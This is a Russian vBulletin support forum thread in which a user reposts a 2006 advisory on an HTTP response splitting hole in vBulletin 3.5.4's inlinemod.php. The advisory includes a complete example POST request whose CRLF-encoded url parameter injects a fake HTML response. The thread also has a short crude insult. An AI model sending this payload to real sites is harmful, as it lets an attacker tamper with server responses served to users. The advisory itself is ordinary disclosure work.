форум vBSupport.ru > Камчатка > Бар «У воблочки»
  • »
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
 
 
 
 
dimats
На доске почёта
Сходите на хуй, пожалуйста.
 
banned nax
Default дырка в 3.5.4
0

Code:
From: Агиевич Игорь aka Shanker <shanker_(at)_mail.ru>  
Date: 01.05.2006 
Subject: vBulletin v3.5.4: HTTP Response Splitting 

Здравствуйте, vuln. 

Уязвимость в параметре url скрипта inlinemod.php при POST-запросе: 
зарегистрированный пользователь может редактировать http-ответ. 

                    ПРИМЕР: 

POST /vb354/inlinemod.php HTTP/1.0 
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 
Content-Length: 93 
Accept: */* 
Accept-Language: en-us 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
Host: www.vulnerable.com 
Content-Type: application/x-www-form-urlencoded 


do=clearthread&url=lala2%0d%0aContent-Length:
%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%
0a%0d%0a 

Уязвимость обнаружена в vBulletin v3.5.4 
Версия 3.0.9 не содержит скрипта inlinemod.php и поэтому не уязвима 


------------------------------------------------------------------ 
С уважением, 
Агиевич Игорь aka Shanker                mailto:shanker@mail.ru
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
zCarot
zМарковь
Хочет третью строчку =)
 
zCarot's Avatar
Default
0

http://vbsupport.ru/forum/showthread.php?t=5096
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 12:21 AM.


Powered by vBulletin® Version 3.6.3
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Loading...